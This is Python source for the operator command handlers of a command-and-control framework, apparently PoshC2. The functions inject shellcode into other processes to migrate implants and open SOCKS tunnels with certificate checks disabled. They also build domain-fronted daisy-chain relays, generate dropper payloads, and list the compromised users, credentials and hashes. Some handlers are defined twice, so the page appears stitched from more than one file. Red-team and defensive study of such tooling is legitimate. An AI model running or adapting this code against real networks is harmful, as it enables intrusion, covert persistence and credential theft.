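def do_migrate(user, command, randomuri):
    """Inject a fresh PowerShell implant into another process on the host.

    Chooses the pre-built shellcode file that matches the implant's
    architecture and comms type, ships it base64-encoded and then tasks
    ``Inject-Shellcode`` with it.  Any text after the word ``migrate`` in
    *command* is passed through verbatim as extra Inject-Shellcode arguments.

    Args:
        user: operator name recorded against the queued tasks.
        command: the raw operator command line (``migrate ...``).
        randomuri: identifier of the implant to task.
    """
    # Everything after the verb is handed to Inject-Shellcode untouched.
    params = re.compile("migrate", re.IGNORECASE).sub("", command)
    implant = get_implantdetails(randomuri)
    implant_arch = implant[10]
    implant_comms = implant[15]
    arch = "64" if implant_arch == "AMD64" else "86"

    if implant_comms == "PS":
        path = "%spayloads/Posh_v4_x%s_Shellcode.bin" % (PoshProjectDirectory, arch)
    elif "Daisy" in implant_comms:
        # Daisy shellcode is generated per daisy server, so the operator has to
        # name it.  The name is operator-supplied and not sanitised before being
        # used as part of a path on the C2 host.
        daisyname = input("Name required: ")
        path = "%spayloads/%sPosh_v4_x%s_Shellcode.bin" % (PoshProjectDirectory, daisyname, arch)
    elif "Proxy" in implant_comms:
        path = "%spayloads/ProxyPosh_v4_x%s_Shellcode.bin" % (PoshProjectDirectory, arch)
    else:
        # Previously fell through with ``path`` unbound and died with a
        # NameError; fail with a clear message and queue nothing instead.
        print("No migrate shellcode is available for comms type %r" % implant_comms)
        return
    shellcodefile = load_file(path)

    check_module_loaded("Inject-Shellcode.ps1", randomuri, user)
    encoded = base64.b64encode(shellcodefile).decode("utf-8")
    # Two tasks: first stage the blob into a variable, then inject from it.
    new_task("$Shellcode%s=\"%s\" #%s" % (arch, encoded, os.path.basename(path)), user, randomuri)
    new_task("Inject-Shellcode -Shellcode ([System.Convert]::FromBase64String($Shellcode%s))%s" % (arch, params), user, randomuri)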
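def do_sharpsocks(user, command, randomuri):
    """Print the server-side SharpSocks command and start the SOCKS client in the implant.

    Generates a random channel name and a key, works out the URL the client
    should talk to (C2 comms host/port for PS implants, operator-supplied
    otherwise), shows the matching ``SharpSocksServerCore`` invocation and,
    after confirmation, tasks the implant and relabels it ``SharpSocks``.

    Args:
        user: operator name recorded against the queued task.
        command: the raw operator command line (not parsed here).
        randomuri: identifier of the implant to task.
    """
    check_module_loaded("SharpSocks.ps1", randomuri, user)
    import string
    # The channel name is shared with the server and identifies the tunnel;
    # draw it from a CSPRNG rather than ``random``.
    from secrets import choice
    channel = "".join(choice(string.ascii_letters) for _ in range(25))
    sharpkey = gen_key().decode("utf-8")
    sharpurls = get_sharpurls()
    sharpurl = select_item("PayloadCommsHost", "C2Server")
    sharpport = select_item("PayloadCommsPort", "C2Server")
    dfheader = select_item("DomainFrontHeader", "C2Server")
    implant = get_implantdetails(randomuri)
    pivot = implant[15]
    if pivot != "PS":
        sharpurl = input("Enter the URL for SharpSocks: ")
    if sharpport != 80 and sharpport != 443:
        if sharpurl.count("/") >= 3:
            # Insert ":port" before the first single "/" (the one after the
            # host, not the "//" of the scheme).  The original passed the
            # builtin ``str`` instead of the URL here, which raised TypeError.
            pat = re.compile(r"(?<!/)/(?!/)")
            sharpurl = pat.sub(":%s/" % sharpport, sharpurl, 1)
        else:
            sharpurl = "%s:%s" % (sharpurl, sharpport)
    print(PoshInstallDirectory + "resources/SharpSocks/SharpSocksServerCore -c=%s -k=%s --verbose -l=%s\r\n" % (channel, sharpkey, SocksHost) + Colours.GREEN)
    ri = input("Are you ready to start the SharpSocks in the implant? (Y/n) ")
    if ri.lower() == "n":
        print("")
    if ri == "" or ri.lower() == "y":
        # NOTE: ``-Insecure`` disables TLS certificate validation on the
        # client side of the SOCKS channel.
        taskcmd = "Sharpsocks -Client -Uri %s -Channel %s -Key %s -URLs %s -Insecure -Beacon 1000" % (sharpurl, channel, sharpkey, sharpurls)
        if dfheader:
            taskcmd += " -DomainFrontURL %s" % dfheader
        new_task(taskcmd, user, randomuri)
        update_label("SharpSocks", randomuri)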
def do_kill_implant(user, command, randomuri):
    """Confirm with the operator, then task the implant to exit and mark it killed.

    Enter (default) or any-case ``y`` confirms; ``n`` prints a message;
    any other answer silently does nothing.
    """
    details = get_implantdetails(randomuri)
    answer = input("Are you sure you want to terminate the implant ID %s? (Y/n) " % details[0])
    if answer.lower() == "n":
        print("Implant not terminated")
    if answer == "" or answer.lower() == "y":
        new_task("exit", user, randomuri)
        kill_implant(randomuri)
def do_tasks(user, command):
    """List every task still queued for pickup, one line per task, then wait for Enter and clear the screen."""
    tasks = get_newtasks_all()
    if tasks is None:
        print_good("No tasks queued!\r\n")
    else:
        rows = []
        for task in tasks:
            details = get_implantdetails(task[1])
            who = "%s\\%s" % (details[11], details[2])
            rows.append("[%s] : %s | %s\r\n" % (details[0], who, task[2]))
        print_good("Queued tasks:\r\n\r\n%s" % "".join(rows))
    input("Press Enter to continue...")
    clear()
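def do_opsec(user, command):
    """Print an opsec summary of the engagement so far.

    Collects, from the implant table and task history: users and hosts
    touched, C2 URLs used, files dropped (uploads, persistence, SCF files)
    and the credentials/hashes captured.  Blocks on Enter and clears the
    screen afterwards.

    Args:
        user: operator name (unused; kept for the handler signature).
        command: the raw operator command line (unused).
    """
    implants = get_implants_all()
    comtasks = get_tasks()
    # Ordered, de-duplicated collections.  The original accumulated growing
    # strings and tested membership with ``in`` on them, i.e. a substring
    # check: "web" was never listed once "webserver" had been recorded.
    hosts = []
    urls = []
    users = []
    seen_users = set()
    uploads = []
    for i in implants:
        if i[3] not in hosts:
            hosts.append(i[3])
        if i[9] not in urls:
            urls.append(i[9])
    target_re = re.compile(r"(?<=-target )\S*")
    for t in comtasks:
        hostname = get_implantdetails(t[1])
        task_cmd = t[2].lower()  # do not shadow the ``command`` parameter
        output = t[3].lower()
        # One line per distinct username, as before.
        if hostname[2] not in seen_users:
            seen_users.add(hostname[2])
            users.append("%s\\%s @ %s\n" % (hostname[11], hostname[2], hostname[3]))
        if "invoke-pbind" in task_cmd and "connected" in output:
            tg = target_re.search(task_cmd)
            # No ``-target`` argument -> re.search returns None; the original
            # indexed it unconditionally and crashed.
            if tg is not None and tg[0] not in hosts:
                hosts.append(tg[0])
        if "uploading file" in task_cmd:
            uploadedfile = task_cmd.partition("uploading file: ")[2].strip()
            filehash = uploadedfile.partition(" with md5sum:")[2].strip()
            uploadedfile = uploadedfile.partition(" with md5sum:")[0].strip().strip('"')
            uploads.append("%s\t%s\t%s\n" % (hostname[3], filehash, uploadedfile))
        if "installing persistence" in output:
            line = task_cmd.replace('\n', '').replace('\r', '').rstrip()
            # Text after the first ":" names the dropped file; fall back to the
            # whole line if there is none rather than raising IndexError.
            parts = line.split(":", 1)
            filenameuploaded = parts[1] if len(parts) > 1 else parts[0]
            uploads.append("%s %s \n" % (hostname[3], filenameuploaded))
        if "written scf file" in output:
            uploads.append("%s %s \n" % (hostname[3], output))
    creds, hashes = parse_creds(get_creds())
    print_good(
        "\nUsers Compromised: \n%s\nHosts Compromised: \n%s\nURLs: \n%s\nFiles Uploaded: \n%s\nCredentials Compromised: \n%s\nHashes Compromised: \n%s"
        % ("".join(users),
           "".join("%s \n" % h for h in hosts),
           "".join("%s \n" % u for u in urls),
           "".join(uploads),
           creds,
           hashes))
    input("Press Enter to continue...")
    clear()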
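def do_migrate(user, command, randomuri):
    """Inject a fresh C# implant into another process on the host.

    Chooses the pre-built shellcode file that matches the implant's
    architecture and comms type and tasks the implant's ``Core`` assembly
    with it.  Any text after the word ``migrate`` in *command* is appended
    verbatim to the Inject-Shellcode arguments.

    Args:
        user: operator name recorded against the queued task.
        command: the raw operator command line (``migrate ...``).
        randomuri: identifier of the implant to task.
    """
    # Everything after the verb is passed through to Inject-Shellcode.
    params = re.compile("migrate", re.IGNORECASE).sub("", command)
    implant = get_implantdetails(randomuri)
    implant_arch = implant[10]
    implant_comms = implant[15]
    arch = "64" if implant_arch == "AMD64" else "86"

    if implant_comms == "C#":
        path = "%sSharp_v4_x%s_Shellcode.bin" % (PayloadsDirectory, arch)
    elif "Daisy" in implant_comms:
        # Daisy shellcode is generated per daisy server, so the operator has to
        # name it.  The name is operator-supplied and not sanitised before being
        # used as part of a path on the C2 host.
        daisyname = input("Name required: ")
        path = "%s%sSharp_v4_x%s_Shellcode.bin" % (PayloadsDirectory, daisyname, arch)
    elif "Proxy" in implant_comms:
        path = "%sProxySharp_v4_x%s_Shellcode.bin" % (PayloadsDirectory, arch)
    else:
        # Previously fell through with ``path`` unbound and died with a
        # NameError; fail with a clear message and queue nothing instead.
        print("No migrate shellcode is available for comms type %r" % implant_comms)
        return
    shellcodefile = load_file(path)
    encoded = base64.b64encode(shellcodefile).decode("utf-8")
    new_task("run-exe Core.Program Core Inject-Shellcode %s%s #%s" % (encoded, params, os.path.basename(path)), user, randomuri)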
def do_startdaisy(user, command, randomuri):
    """Interactively configure and start a daisy-chain relay on this implant.

    Prompts the operator for the bind address/port, the upstream endpoint
    (the C2 itself for the first hop, a previous daisy otherwise) and any
    proxy settings, then tasks ``invoke-daisychain`` on the implant and
    relabels it ``DaisyHost``.  Optionally generates a full payload set
    that beacons via the new daisy.

    Args:
        user: operator name recorded against the queued task.
        command: the raw operator command line (not parsed here).
        randomuri: identifier of the implant that will host the daisy.
    """
    check_module_loaded("daisy.dll", randomuri, user)
    elevated = input(Colours.GREEN + "Are you elevated? Y/n " + Colours.END)
    domain_front = ""
    proxy_user = ""
    proxy_pass = ""
    proxy_url = ""
    if elevated.lower() == "n":
        # Unelevated: the relay can only bind to localhost; offer to abort.
        cont = input(Colours.RED + "Daisy from an unelevated context can only bind to localhost, continue? y/N " + Colours.END)
        if cont.lower() == "n" or cont == "":
            return
        bind_ip = "localhost"
    else:
        bind_ip = input(Colours.GREEN + "Bind IP on the daisy host: " + Colours.END)
    bind_port = input(Colours.GREEN + "Bind Port on the daisy host: " + Colours.END)
    firstdaisy = input(Colours.GREEN + "Is this the first daisy in the chain? Y/n? " + Colours.END)
    if firstdaisy.lower() == "y" or firstdaisy == "":
        # First hop: upstream is the C2, with optional domain fronting and proxy.
        upstream_url = input(Colours.GREEN + f"C2 URL (leave blank for {PayloadCommsHost}): " + Colours.END)
        if DomainFrontHeader:
            domain_front = input(Colours.GREEN + f"Domain front header (leave blank for {DomainFrontHeader}): " + Colours.END)
        else:
            domain_front = input(Colours.GREEN + f"Domain front header (leave blank for configured value of no header): " + Colours.END)
        proxy_user = input(Colours.GREEN + "Proxy user (<domain>\\<username>, leave blank if none): " + Colours.END)
        proxy_pass = input(Colours.GREEN + "Proxy password (leave blank if none): " + Colours.END)
        proxy_url = input(Colours.GREEN + "Proxy URL (leave blank if none): " + Colours.END)
        # Blank answers fall back to the configured C2 values.
        if not upstream_url:
            upstream_url = PayloadCommsHost
        if not domain_front:
            domain_front = DomainFrontHeader
    else:
        # Later hop: upstream is the previous daisy over plain http; its host
        # name is also used as the Host/front header.
        upstream_daisy_host = input(Colours.GREEN + "Upstream daisy server: " + Colours.END)
        upstream_daisy_port = input(Colours.GREEN + "Upstream daisy port: " + Colours.END)
        upstream_url = f"http://{upstream_daisy_host}:{upstream_daisy_port}"
        domain_front = upstream_daisy_host
    urls = get_allurls().replace(" ", "")
    useragent = UserAgent
    # NOTE(review): the proxy password is embedded in the task text sent to the
    # implant; presumably the task channel is encrypted end to end — confirm.
    command = f"invoke-daisychain \"{bind_ip}\" \"{bind_port}\" \"{upstream_url}\" \"{domain_front}\" \"{proxy_url}\" \"{proxy_user}\" \"{proxy_pass}\" \"{useragent}\" {urls}"
    new_task(command, user, randomuri)
    update_label("DaisyHost", randomuri)
    createpayloads = input(Colours.GREEN + "Would you like to create payloads for this Daisy Server? Y/n ")
    if createpayloads.lower() == "y" or createpayloads == "":
        name = input(Colours.GREEN + "Enter a payload name: " + Colours.END)
        daisyhost = get_implantdetails(randomuri)
        # PowerShell snippet forcing an empty proxy when no proxy URL is set.
        proxynone = "if (!$proxyurl){$wc.Proxy = [System.Net.GlobalProxySelection]::GetEmptyWebProxy()}"
        C2 = get_c2server_all()
        # Payloads point at http://<bind_ip>:<bind_port> (the daisy), not at the C2.
        # With the unelevated path above bind_ip is "localhost".
        newPayload = Payloads(C2[5], C2[2], f"http://{bind_ip}", "", f"{bind_port}", "", "", "", "", proxynone, C2[17], C2[18], C2[19], "%s?d" % get_newimplanturl(), PayloadsDirectory)
        # Replace the "$pid;<upstream_url>" fragment of the PS dropper with
        # "$pid;<domain>@<hostname>" of the daisy host.
        newPayload.PSDropper = (newPayload.PSDropper).replace("$pid;%s" % (upstream_url), "$pid;%s@%s" % (daisyhost[11], daisyhost[3]))
        newPayload.CreateRaw(name)
        newPayload.CreateDlls(name)
        newPayload.CreateShellcode(name)
        newPayload.CreateEXE(name)
        newPayload.CreateMsbuild(name)
        newPayload.CreateCS(name)
        new_urldetails(name, C2[1], C2[3], f"Daisy: {name}", upstream_url, daisyhost[0], "")
        print_good("Created new %s daisy payloads" % name)
def do_modulesloaded(user, command, randomuri):
    """Print the modules recorded for this implant (field 14 of its record), then ask it to report its live list via ``listmodules``."""
    details = get_implantdetails(randomuri)
    print(details[14])
    new_task("listmodules", user, randomuri)
def do_modulesloaded(user, command, randomuri):
    """Print the modules recorded for this implant (field 14 of its record).

    Note: this is a second definition of ``do_modulesloaded`` on this page;
    in Python the later definition replaces the earlier one, which also
    queued a ``listmodules`` task.
    """
    print(get_implantdetails(randomuri)[14])
def do_get_pid(user, command, randomuri):
    """Print the process ID recorded for this implant (field 8 of its record)."""
    print(get_implantdetails(randomuri)[8])